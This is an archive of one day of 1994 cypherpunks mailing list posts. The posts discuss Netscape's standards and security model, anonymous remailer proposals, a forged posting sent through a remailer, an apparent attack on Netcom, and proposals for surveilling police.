> Date: Sun, 11 Dec 1994 00:51:46 -0500
> From: Amanda Walker
>
> It's my personal feeling that Netscape doesn't have the right talent mix to
> develop *any* Internet software, secure or not.
>
> Well, I can't and won't attempt to speak to the overall mix of talent,
> however I think that such a strong statement really needs to be
> accompanied by some sort of an explanation.

I'll throw in that from the perspective of someone running a server, their approach of requesting all graphics simultaneously over different sockets in the name of client performance is disastrous.
This causes most servers to fork N times more per page, where N is the avg. # of graphics. Not that this shouldn't eventually be dealt with by some way to request the whole ball of wax in a single package, but some have speculated that this was done deliberately in order to sabotage server software other than their own. (Their original business model, as I understand it, was to give clients away for free and sell server software.)

Also, their flip-flops on what they plan to charge for, and what will be free... for instance, they initially led folks to believe that the client would be free, encouraging many to adopt it, only to find out that later versions would only be free for a narrowly drawn group of individuals. I have nothing against shareware/demoware, when it is clearly labelled as such... this is just mildly slimy.

I will say though, that their Windows version crashes substantially less than the NCSA one, which is increasingly my metric for stuff I inflict on my users. Fortunately, there are a _lot_ of other commercial options coming out that I can choose from on the basis of price, performance, not crashing, trust in the developers' integrity, etc.

Doug

From anonymous-remailer at shell.portal.com Sun Dec 11 09:01:01 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 11 Dec 94 09:01:01 PST
Subject: NYM REMAILER PROPOSAL
Message-ID: <199412111705.MAA22181@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

lcottrell at popmail.ucsd.edu (Lance Cottrell) is known to have said:

LC>I propose two changes:
>1) To facilitate replying to nyms, I should be able to send mail to the
>remailer indicating the nym it should appear to be from. Then a recipient
>would simply hit reply, and the response would go back to the real sender.

LC>2) I propose the use of message pools rather than return addresses. With
>enough subscribers, the best way to do this would be using mailing lists.
>There already exist many tools which could filter out all pool messages
>other than yours.

Does anyone have the help-file for the anonymous pool of the extropia-remailer, the one of ? In the interest of widespread usage, please post it to the entire list.

If you can, please also let us know if there is a way for us to subscribe via an anonymous remailer to an address we designate, like for instance with the command

subscribe special at address.here

where the special address given is obviously different from the one in the header of the subscription message (which would merely be a remailer).

- -----------------------------------

Does anyone know more about Sameer's C2-services? In the interest of widespread usage, please post a summary to the entire cypherpunks-list. Also urge others to copy, forward and post elsewhere.

- -----------------------------------

Last, I support the idea of a while ago that the remailer-operators mailing list should be open for public subscription so all those interested can get on and follow what is happening there. But how do we subscribe? Let us know, Sameer!

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From werewolf at io.org Sun Dec 11 09:13:37 1994
From: werewolf at io.org (Mark Terka)
Date: Sun, 11 Dec 94 09:13:37 PST
Subject: Storm Brewing Over Forged Bob Rae Posting?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Anybody taken note of the ruckus about a forged posting from Bob Rae (the premier of the Canadian province of Ontario)? Seems like some joker posted a fake message from Rae through Hal's remailer at portal.
Now all the lame press (and some even LAMER USENET readers) are screaming foul. I bet there will be renewed interest in the cypherpunk remailers in the next few days :>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

From eric at remailer.net Sun Dec 11 09:43:02 1994
From: eric at remailer.net (Eric Hughes)
Date: Sun, 11 Dec 94 09:43:02 PST
Subject: "Crypto Anarchy and Virtual Communities"
In-Reply-To: <199412110919.BAA10461@netcom6.netcom.com>
Message-ID: <199412111840.KAA28398@largo.remailer.net>

   From: tcmay at netcom.com (Timothy C. May)

   I hate to put files in my ftp account, as Netcom's ftp site is grossly overcrowded and nearly all attempts to access it fail. (Netcommies are roadkill on the I-way.))

Tim May, famous net.commie.

Uh, wait, ...

Eric

From alano at teleport.com Sun Dec 11 10:25:51 1994
From: alano at teleport.com (Alan Olsen)
Date: Sun, 11 Dec 94 10:25:51 PST
Subject: A few articles of interest...
Message-ID: <199412111825.KAA24116@desiree.teleport.com>

For those who have not seen it...

The January 1995 issue of Dr. Dobbs has two articles of interest.

- Bruce Schneier has an article on GOST. (A Soviet variant on DES.)
- An article on RC5 by Ron Rivest! (Which includes source code!)

Dr. Dobbs has had a number of good crypto related articles as of late. (Having a regular column by Bruce Schneier could be part of it...)

Also, for those who are interested in Windows 95 (users 0)... Andrew Schulman has an article on Windows 95 from the inside. (This is part of his new book and the reason he got kicked off of the beta team.) Interesting reading.
| "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From amanda at intercon.com Sun Dec 11 10:35:53 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 10:35:53 PST Subject: BofA+Netscape Message-ID: <199412111835.NAA26734@intercon.com> > Would you mind elaborating? Sure. Netscape has managed to alienate many IETF working groups, including HTML, HTTP Security, IP security, and so on by implementing and distributing half-cooked "extensions" to HTML & HTTP without a lot of forethought. As a result, they've greatly multiplied existing interoperability problems, and created a very confused environment in precisely those areas that most need standardization and consensus (security and HTML itself). That help? --Amanda From m5 at vail.tivoli.com Sun Dec 11 10:53:34 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Sun, 11 Dec 94 10:53:34 PST Subject: A few articles of interest... In-Reply-To: <199412111825.KAA24116@desiree.teleport.com> Message-ID: <9412111853.AA10303@vail.tivoli.com> Alan Olsen writes: > - An article on RC5 by Ron Rivest! (Which includes source code!) I'm still very curious as to how the applied-for patent on RC5 protects the algorithm. Perhaps it just protects the RC5 algorithm family specifically, the idea being that if it becomes very popular then anyone implementing it for compatibility reasons will be forced to purchase a license to do so. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. 
||| Tivoli Systems, Austin, TX: |
| (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" |

From klbarrus at owlnet.rice.edu Sun Dec 11 11:03:22 1994
From: klbarrus at owlnet.rice.edu (Karl Lui Barrus)
Date: Sun, 11 Dec 94 11:03:22 PST
Subject: "Crypto Anarchy and Virtual Communities"
In-Reply-To: <199412110919.BAA10461@netcom6.netcom.com>
Message-ID: <9412111902.AA01983@snowy.owlnet.rice.edu>

Timothy C. May wrote:

>I hate to put files in my ftp account, as Netcom's ftp site is
>grossly overcrowded and nearly all attempts to access it fail.
>(Netcommies are roadkill on the I-way.)) But it is there, at
>ftp.netcom.com, in pub/tc/tcmay.

I have managed to obtain this file, and have placed it at the gopher site.

Now, chaos.bsu.edu has recently moved to chaos.taylored.com, which is still a "host unknown" for me. But, using its ip address works just fine "gopher 204.95.228.28". Actually, "gopher chaos.bsu.edu" still works for me, but this is supposed to change by January...

Anyway, the file is in the Essays directory as "Crypto Anarchy and Virtual Communities". One (or more) of the following should work:

gopher://chaos.taylored.com/Cypherpunks Gopher Server/
gopher://204.95.228.28/Cypherpunks Gopher Server/
gopher://chaos.bsu.edu/Cypherpunks Gopher Server/

and then look in Essays/Crypto Anarchy and Virtual Communities

--
Karl L. Barrus: klbarrus at owlnet.rice.edu
2.3: 5AD633; D1 59 9D 48 72 E9 19 D5 3D F3 93 7E 81 B5 CC 32
2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5 E8 97 64 7E 20 95 60 D9
"One man's mnemonic is another man's cryptography" - K. Cooper

From mailbot at sled.com Sun Dec 11 11:17:47 1994
From: mailbot at sled.com (SLED)
Date: Sun, 11 Dec 94 11:17:47 PST
Subject: Four11 Free Listing Thank You - KEEP THIS MESSAGE!
Message-ID: <199412111920.LAA18531@ayn.sled.com>

==========================================================================
_______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| FREE LISTING THANK YOU _____ / /__/ /__/ / \ _|_ _|_ KEEP THIS MESSAGE!
==========================================================================

THANKS

Thanks for adding your listing to the Four11 Online User directory. We hope you find this directory a helpful resource and we encourage you to send any comments about the service to comments at Four11.com. If the directory puts you in contact with a lost friend or colleague, please let us know. Please send your friends a copy of our free listing form or direct them to our home page at URL http://www.Four11.com/.

YOUR PASSWORD

Below is your password. PLEASE KEEP A RECORD OF YOUR PASSWORD IN A SAFE PLACE. You will need it for searching the directory, changing your listing, and accessing other free services. You can change your password by sending an e-mail to change at Four11.com. Remember to include your current password as the body of the message.

Your password is "thibsi".

YOUR LISTING

Your listing will appear in the directory, usually within 24 hours, but you can access the directory immediately. For complete information on the services now available to you, send an e-mail to info at Four11.com.

TO SEARCH

To search the Online User Directory, connect to our Web page at URL http://www.Four11.com/ or request an e-mail search form by sending an e-mail to finduser at Four11.com.

TO OBTAIN SOMEONE'S PGP KEY

To obtain someone's PGP Public Key, connect to our Web page at URL http://www.Four11.com/ or send an e-mail to key at Four11.com and include the person's e-mail address as the body of the message.
========================================================================== * Online User Directory * PGP Key Server * _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| info at Four11.com _____ / /__/ /__/ / \ _|_ _|_ http://www.Four11.com/ SLED Corporation * humans at sled.com * (415)323-2508 * Fax: (415)326-0730 ========================================================================== (c) 1994 SLED Corporation, All Rights Reserved chief nerd has spoken From mailbot at sled.com Sun Dec 11 11:17:52 1994 From: mailbot at sled.com (SLED) Date: Sun, 11 Dec 94 11:17:52 PST Subject: Four11 Membership Form Message-ID: <199412111920.LAA18534@ayn.sled.com> ========================================================================== _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| MEMBERSHIP FORM _____ / /__/ /__/ / \ _|_ _|_ ========================================================================== In response to your recent request for free access to the Four11 Online User Directory, you have been sent two messages via e-mail. The first message includes your password and this message is the second. If you do not receive your password within 24 hours, please contact us at support at Four11.com. We hope you find the Online User Directory a helpful resource. If you find this service useful and wish to support it as well as take advantage of additional features, please consider becoming a member. A Four11 membership provides the following benefits: + Expanded Listing With Alternative Names And Display Message + Additional Group Connections + Search Agents + PGP Public Key Certification And Storage On Key Server + Hot Link To A Personal Web Page If you wish to become a member ($20.00 USD), follow the instructions on this form. If you wish to learn more about these benefits, send an e-mail to info at Four11.com. 
========================================================================== PGP USERS If you are a PGP user and wish to store your public key on our key server, request a special membership form by sending an e-mail to upgrade-pgp at Four11.com. All others should use this form. ========================================================================== THREE STEPS TO A MEMBERSHIP 1. Pay a sign-up fee ($20.00 USD) which also covers the first year of service. (Our current yearly renewal is $10.00.) 2. Receive a notification from us via e-mail. 3. Enjoy your member benefits. ========================================================================== PICK A PAYMENT OPTION BELOW: TO SIGN-UP BY PHONE (VISA and MASTERCARD ONLY) Call (415) 323-2508 BEFORE CALLING, please read the Acceptable Use Policy below. TO SIGN-UP BY FAX OR MAIL (VISA, MASTERCARD, OR CHECK) 1. Print a copy of this form and follow the remaining instructions. 2. Read the Acceptable Use Policy at the end of this form. 3. Please check the name and e-mail address below. If not correct, CLEARLY print the correct information in the space to the right. Please do not cross out the original information. Name: Anne E Mous Primary E-Mail Address: cypherpunks at toad.com 4. Print Your Day Time Phone Number Clearly: ____________________________ (In case there is a problem with your order.) 5a. If you are paying by credit card: Total Charges: $20.00 USD ( ___MC, ___ VISA ) Credit Card No. (PRINT CLEARLY): ______________________________________________________________________ Expiration Date:_______________________ Signature:____________________________________________________________ Fax this entire form to (415) 326-0730 or mail it to: SLED Corporation PO Box 309 Redwood City, CA 94064 5b. 
If you are paying by check: Mail this entire form with a check for $20.00 USD ($27.00 CAN) to:

SLED Corporation
PO Box 309
Redwood City, CA 94064

When we have processed your payment, we will send a notification to your primary e-mail address. Thanks for your business!

ACCEPTABLE USE POLICY

Four11 Directory Services are offered by SLED subject to rules governing the use of these systems and related services. By subscribing to and using Four11 Directory Services, you agree to pay all applicable fees and to abide by this Acceptable Use Policy and applicable rules.

1. You agree to use your own name and other personal information.
2. You agree to not use the system for any purpose that is illegal.
3. You agree to not use the directory to contact persons in a way that they find objectionable.
4. You agree to not copy information from the database for commercial purposes and/or financial gain.
5. SLED reserves the right to terminate a user's access to the system.
6. SLED makes no warranties.

Additional information can be obtained by requesting our FAQ (send an e-mail to faq at Four11.com or connect to URL http://www.Four11.com/). If you have any legal questions or concerns, please read the FAQ.
========================================================================== * Online User Directory * PGP Key Server * _______ ___ ___ ___ _ _ ______ /__ / / / / /___/ /| /| info at Four11.com _____ / /__/ /__/ / \ _|_ _|_ http://www.Four11.com/ SLED Corporation * humans at sled.com * (415)323-2508 * Fax: (415)326-0730 ========================================================================== (c) 1994 SLED Corporation, All Rights Reserved chief nerd has spoken From DarScott at aol.com Sun Dec 11 11:55:08 1994 From: DarScott at aol.com (DarScott at aol.com) Date: Sun, 11 Dec 94 11:55:08 PST Subject: Children's Books Mentioning Privacy Message-ID: <941211145500_3311823@aol.com> On Tuesday I will be giving a talk on Children's Books with Freedom Themes, but I have not found anything on e-mail privacy or privacy in general. Any suggestions? Fiction or Nonfiction. Dar Scott From mpd at netcom.com Sun Dec 11 12:32:45 1994 From: mpd at netcom.com (Mike Duvos) Date: Sun, 11 Dec 94 12:32:45 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: Message-ID: <199412112031.MAA21646@netcom12.netcom.com> > Now all the lame press (and some even LAMER USENET readers) are screaming > foul. I bet there will be renewed interest in the cypherpunk remailer's in > the next few days :> I suppose this means we need strong laws against "message laundering." -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From tcmay at netcom.com Sun Dec 11 12:37:27 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 12:37:27 PST Subject: Storm Brewing Over Forged Bob Rae Posting? In-Reply-To: Message-ID: <199412112037.MAA16882@netcom18.netcom.com> Mark Terka wrote: > Anybody taken note of the ruckus about a forged posting from Bob Rae (the > premier of the Canadian province of Ontario)? Seems like some joker posted > a fake message from Rae through Hal's remailer at portal. 
>
> Now all the lame press (and some even LAMER USENET readers) are screaming foul.
> I bet there will be renewed interest in the cypherpunk remailers in the next
> few days :>

Thanks for mentioning this, but I had some trouble finding it in the *.canada.* newsgroups. I found it in "ont.general" after seeing mention of the controversy in "alt.anonymous."

The newspaper article cites comments from a manager at Portal, denying responsibility, so we _may_ be seeing some repercussions. (I have no idea if Hal has been contacted...perhaps he can comment here.)

In other news, seen in the various anon server groups, there's a raging debate about some remailers censoring^H^H^H^Hscreening for content, and not passing on (plaintext, obviously) messages they dislike, or think are offensive, or insulting/supportive of Scientology, etc. (I haven't read the Scientology debate yet, but apparently a remailer named "Homer" is involved, one way or another.)

Once again, and not for the last time, it is critical that *remailer-hosting sites* be placed at arms-length from *specific instances of remailer accounts*.

To put it more simply, a site like c2.org could offer _dozens_ of remailer accounts. (The site owner is not supposed to look at mail, according to the ECPA...in my non-lawyerly view, this provides valuable protection for the site owner. Not for the remailer account owners, but, then, they are presumably acquired through pseudonyms, aren't they?)

In yet another piece of news, Netcom has apparently been hacked/attacked rather badly. The "netcom.general" discussion group (local to Netcom) is filled with garbage posts, forged posts, cancelled articles, etc. Messages about "root" being forged appeared, then disappeared. Netcom is quiet on this, but has been running "crack" on all of their machines for the last several days--apparently to (somehow?) help to find security flaws....I have no idea why running crack to find weak passwords of users is such a high priority.
Maybe the apparent attack is related, maybe not. News has basically stopped flowing into Netcom, and mail is still somewhat squirrelly. Phil Karn asked me if the "Internet Liberation Front" was/is my doing. Nope. (The ILF--not to be confused with the "Information Liberation Front," which I may or may not know something about--was apparently claiming to have cracked some other online service providers. I don't know if the current situation at Netcom is related to this.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From amanda at intercon.com Sun Dec 11 13:21:11 1994 From: amanda at intercon.com (Amanda Walker) Date: Sun, 11 Dec 94 13:21:11 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412111620.AA41983@eldamar.walker.org> Several people have asked me to clarify my recent comments about Netscape. I am more than happy to oblige. First of all, let me begin by saying that I am a biased observer, and that all of this is my personal opinion. My annoyance with Netscape is also closer to the surface this week than it normally is, due to a variety of factors (including having just returned from the San Jose IETF meeting). My initial comment, and the ones that follow in this message, are thus more frank than is my usual style on, say, public Usenet newsgroups. That being said, here are some of the data that has gone into my impressions of Netscape so far. (1) Netscape plays very fast and loose with HTML. 
Rather than participating in the existing standardization efforts, they have indiscriminately added "extensions" to it that are not supported by any other client software, and which in some cases go directly against HTML's markup-oriented structure. This only adds more confusion to an already muddy area, delays the prospects for a standard HTML specification, and divides the WWW into "WWW Classic" and "Netscape-compatible". Personally, as a strong proponent of universal interoperability, I find this reprehensible. There is no need to bypass existing efforts just to add cosmetic value to your own software. (2) The Netscape Secure Sockets proposal has an extremely poor security model. It is not an end-to-end security model, but rather relies on transport level security, which is in my view dangerously inadequate for reasons which should be obvious to most of the folks on this list. It is also tied directly to the RSA certification hierarchy. Now, for those of us who have X.509 certificates rooted in the RSA Commercial Certification authority, that's fine, but it also means that any other WWW client that wishes to interoperate with Netscape's "secure servers" must license TIPEM from RSA Data Security, and consequently pay RSA's rather high royalties, unless the software is free (in which case RSAREF can be used). This serves as a direct barrier to competition from other commercial vendors. This is not all bad--I happen to like RSADSI's products and technology--but promoting a transport-level security system instead of an end-to-end one is to my mind simply irresponsible. There has been no peer review of Netscape's security model--it was simply implemented by fiat, without regard for the IETF standards process. I find that this leaves a very bad taste in my mouth. I also heard similar sentiments from a wide variety of other attendees at the IETF, including members of the IP Security working group, people who attended the Secure HTTP BOF, and others. 
This leads me to believe that it's not just a matter of me leaping to wild conclusions.

(3) Netscape is viewed as a "loose cannon" by most of the other commercial players in the WWW arena, mainly because they have introduced a fair amount of FUD into the HTML standardization effort, while simultaneously promoting themselves as being standards-based. Members of Apple's "Cyberdog" project and Microsoft's web projects, who *are* trying to contribute to the standards process, had particularly excoriating things to say in this regard.

Now, as I said, I am biased and my comments about Netscape are strictly my personal opinions. I will be perfectly willing to revise these opinions as I receive more data. For example, if Netscape takes a more active part in the standards process, works with RSA to secure wider availability of the underlying technology required by their proposals, and generally demonstrates a willingness to play nicely with other children, that would be great, and I'll just as strongly defend them as I am panning them now.

However, in my view, they have not shown a good initial track record. Only time will tell.

Amanda Walker
InterCon Systems Corporation

From asgaard at sos.sll.se Sun Dec 11 13:32:38 1994
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Sun, 11 Dec 94 13:32:38 PST
Subject: The Four Horsemen
Message-ID:

From the recent essay "Anarchy" by T.C. May:

   The use of encryption by "evil" groups, such as child pornographers, terrorists, abortionists, abortion protestors, etc., is cited by those who wish to limit civilian access to crypto tools. We call these the "Four Horsemen of the Infocalypse", as they are so often cited as the reason why ordinary citizen-units of the nation-state are not to have access to crypto.

A problem with the Four Horsemen is the various definitions currently in use on the Net. Two of them are generally agreed upon: Drug Dealer and Terrorist. Usually either Pedophile or Pornographer is the third.
The fourth varies the most: Tax Evader, Spy etc. Abortionist and Abortionist-Killer are new prospects.

Who were the Original Four? (No, I'm not asking about White, Red, Black and Pale.)

Mats

quit

From crawford at scruznet.com Sun Dec 11 13:44:38 1994
From: crawford at scruznet.com (Michael D. Crawford)
Date: Sun, 11 Dec 94 13:44:38 PST
Subject: Real-time surveillance of the police
Message-ID: <199412112144.NAA09211@scruz.net>

-----BEGIN PGP SIGNED MESSAGE-----

In the December '94 issue of Wired, ("Watching the Detectives", p. 141), Sandy Sandfort describes Bob Fleming's work to make real-time permanent recordings of the body positions of police officers.

One could place a small sensor on each wrist and ankle, and record the positions (and velocities) of the cop's body to within a _centimeter_, anywhere in a city.

The advantage for cops is that a fallen officer can be quickly located, and a cop's claim to have witnessed an event can be corroborated by demonstrating that he was actually there.

The advantage for society is that the cop's behaviour, such as billy-club swinging velocity, can be monitored. It could detect gunfire, too, by measuring the kick that is transmitted down the cop's wrist.

This would work to the extent that the equipment is actually mounted on the cop it claims to belong to, so some manner of authentication would be needed.

Also discussed is the idea of car or helmet mounted cameras, transmitting images continuously, to be stored by a neutral third-party, in the event of a legal challenge, either from the accused claiming that the cop is lying, or of claims of police brutality.

After the Rodney King incident, I had the notion, (which I did not act on to actually promote, I'm sorry to say), that organizations representing people that feel persecuted by the law could issue disposable cameras to all their members.
For example, if a street gang felt the cops were thumping their members with unwarranted enthusiasm, the gang could purchase a case of cameras at the local Price Club, and everyone could carry them to photograph the cops.

In addition, cameras could be unobtrusively mounted on car hoods, perhaps with three or four such cameras multiplexing their images onto a single videotape (one wants a wide, but not necessarily tall aspect ratio; three such cameras with fisheye lenses could cover the whole perimeter of a car). The VCR would be in a fireproof safe welded to the car frame (or use a surplus flight recorder package), so it would take extra effort for a cop to conceal the evidence of wrongdoing after mistreating the driver. It would also be handy for assigning responsibility in traffic accidents.

Yes, that's right - keep surveillance cameras going on _yourself_. If you're not doing anything illegal, you've got nothing to fear from taping everything you do.

Of course, after the difficulty the City of Santa Cruz had in establishing a Police Review commission, and considering that its powers were eviscerated in light of a lawsuit threat by a police union, I expect that it will be difficult to convince our Nation's Finest to adopt this new technology - though I'm sure they'd be happy to apply it to parolees and those serving on probation.

Adoption could be initially achieved, though, by pointing out to private security firms that their liability could be reduced by monitoring their employees - obvious slackers could be immediately fired, troublesome guards could be disciplined, and the firm could demonstrate in court that the guard was nowhere near the scene when the plaintiff claimed to have been beaten by a guard. Private security guards have nowhere near the influence that police unions do, and so would have little power in arguing against it.
Later on, cities faced with expensive lawsuits could strike a deal with the liability insurance companies to save money if the city cops use this stuff.

After the DT fiasco, and the mention yesterday of the DOJ's new Big Brother Database, I thought you'd like to hear that someone's working on giving Big Bro the stick too.

I personally feel that a society that _needed_ to do this to its cops is an abhorrent society. But perhaps we could strike a deal with Big Bro - if you don't tap our phones, we won't pass laws to tap your cops.

Best Wishes in this Holiday Season,

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

From tcmay at netcom.com Sun Dec 11 13:45:02 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 11 Dec 94 13:45:02 PST
Subject: The Four Horsemen
In-Reply-To:
Message-ID: <199412112144.NAA08154@netcom4.netcom.com>

Mats Bergstrom wrote:

> >From the recent essay "Anarchy" by T.C.
May: > > The use of encryption by "evil" groups, such as > child pornographers, terrorists, abortionists, abor- > tion protestors, etc., is cited by those who wish to > limit civilian access to crypto tools. We call these the > "Four Horsemen of the Infocalypse", as they are so > often cited as the reason why ordinary citizen-units > of the nation-state are not to have access to crypto. > > A problem with the Four Horsemen is the various definitions > currently in use on the Net. Two of them are generally agreed > upon: Drug Dealer and Terrorist. Usually either Pedophile or > Pornographer is the third. The fourth varies the most: Tax > Evader, Spy etc. Abortionist and Abortionist-Killer are new > prospects. > > Who were the Original Four? (No, I'm not asking about White, I probably should have been more careful in explicitly listing the "main candidates" for the Four Horsemen: - Terrorists - Drug Dealers - Money Launderers - Child Pornographers Others may have different lists, but these are the main "threats" suggested by most. My reference to "abortionists, abortion protestors" was to show that _both_ sides of the issue consider the other side to be a threat. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From anonymous-remailer at shell.portal.com Sun Dec 11 13:53:11 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 11 Dec 94 13:53:11 PST Subject: What Happened to Xenon ? 
Message-ID: <199412112152.NAA01048@jobe.shell.portal.com>

Anybody know what became of Xenon (qwerty at netcom.com)? I did a finger of his account and got back unknown user ... He seemed like somebody who was in the spotlight, funny that he just dropped out of sight.

^X

From cactus at seabsd.hks.net Sun Dec 11 13:58:13 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Sun, 11 Dec 94 13:58:13 PST
Subject: Broadcasts and the Rendezvous Problem
Message-ID: <199412112203.RAA24716@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Seems to me that one of the fundamental building blocks necessary to a host of anonymous services is a means of rendezvousing in a manner that is not vulnerable to traffic analysis.

The obvious solution to this is through the use of a broadcast medium. Has anybody created an alt.* group purely for remailer-associated rendezvous?

If not, it seems like that would be a very worthwhile direction to pursue: with such a mechanism, nodes of a "remailer net" can surface and disappear with minimal disruption to the net.

Folks spend a lot of time bemoaning the transience of specific instances of remailer nodes: why not turn this into an advantage by architecting a network of systems that is resilient against the destruction and/or compromise of individual nodes?

- --
Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com | neither more nor less.'" - Lewis Carroll

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLut3AioZzwIn1bdtAQHocwGAq/KWiFGi2nJ4Kuve/0jUv1xX5aAJknWc
NRfJUts3Y0PfKZZbSETEwYPNfX48O4TB
=NIBb
-----END PGP SIGNATURE-----

From tcmay at netcom.com Sun Dec 11 14:05:23 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 11 Dec 94 14:05:23 PST
Subject: Real-time surveillance of the police
In-Reply-To: <199412112144.NAA09211@scruz.net>
Message-ID: <199412112204.OAA10552@netcom4.netcom.com>

Michael D. Crawford wrote:

> In the December '94 issue of Wired, ("Watching the Detectives", p. 141),
> Sandy Sandfort describes Bob Fleming's work to make real-time permanent
> recordings of the body positions of police officers.
>
> One could place a small sensor on each wrist and ankle, and record the
> positions (and velocities) of the cop's body to within a _centimeter_,
> anywhere in a city.

As it happens, I'm an investor in Bob Fleming and Cherie Kushner's start-up company. (One of several investors.) I've known them for several years and have visited their lab/home many times. (It was at their party that I got to spend a day talking to Vernor Vinge, as some of you may recall me commenting on.)

So, I'd like to comment on some of these points.

> The advantage for cops is that a fallen officer can be quickly located, and
> a cop's claim to have witnessed an event can be corroborated by
> demonstrating that he was actually there.

Bob and Cherie _cringe_ when I joke about their localizers being the basis of the nation's "position escrow system." They fully understand the ramifications and potential abuses of a system which could allow position tracking to a few meters of every citizen-unit in a country. (And a huge early market is expected to be "child localization," a la the child-minder beacons some parents are already attaching to their children. Bob and Cherie's system is much smaller, cheaper, etc.)

> After the Rodney King incident, I had the notion, (which I did not act on
> to actually promote, I'm sorry to say), that organizations representing
> people that feel persecuted by the law could issue disposable cameras to
> all their members. For example, if a street gang felt the cops were

This was an idea explored in detail by David Brin in 1990 in his novel "Earth." Video cameras are ubiquitous and have a major effect on casual street crime.

...

> Yes, that's right - keep surveillance cameras going on _yourself_. If
> you're not doing anything illegal, you've got nothing to fear from taping
> everything you do.

This scenario is a likely way that "position escrow" will evolve, from a voluntary escrowing (incl. timestamping, etc.). "Those with nothing to hide" will agree to escrow their movements...this will exculpate them in suspected crimes, etc. A slippery slope.

On the topic of how these localizers actually work, I'm not at liberty to talk about the technology. It's novel, and uses a *lot* of digital signal processing. It doesn't use GPS and it's not a variant of cellular telephones.

--Tim May

--
..........................................................................
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
408-688-5409 | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From tcmay at netcom.com Sun Dec 11 14:11:22 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 11 Dec 94 14:11:22 PST
Subject: Broadcasts and the Rendezvous Problem
In-Reply-To: <199412112203.RAA24716@bb.hks.net>
Message-ID: <199412112210.OAA10976@netcom4.netcom.com>

L. Todd Masco wrote:

> Seems to me that one of the fundamental building blocks necessary to
> a host of anonymous services is a means of rendezvousing in a manner that
> is not vulnerable to traffic analysis.
>
> The obvious solution to this is through the use of a broadcast medium.
> Has anybody created an alt.* group purely for remailer-associated
> rendezvous?

Isn't this what "alt.anonymous.messages" is all about?
Video cameras are ubiquitous and have a major effect on casual street crime.

...

> Yes, that's right - keep surveillance cameras going on _yourself_. If
> you're not doing anything illegal, you've got nothing to fear from taping
> everything you do.

This scenario is a likely way that "position escrow" will evolve, from a voluntary escrowing (incl. timestamping, etc.). "Those with nothing to hide" will agree to escrow their movements...this will exculpate them in suspected crimes, etc. A slippery slope.

On the topic of how these localizers actually work, I'm not at liberty to talk about the technology. It's novel, and uses a *lot* of digital signal processing. It doesn't use GPS and it's not a variant of cellular telephones.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From tcmay at netcom.com Sun Dec 11 14:11:22 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 11 Dec 94 14:11:22 PST
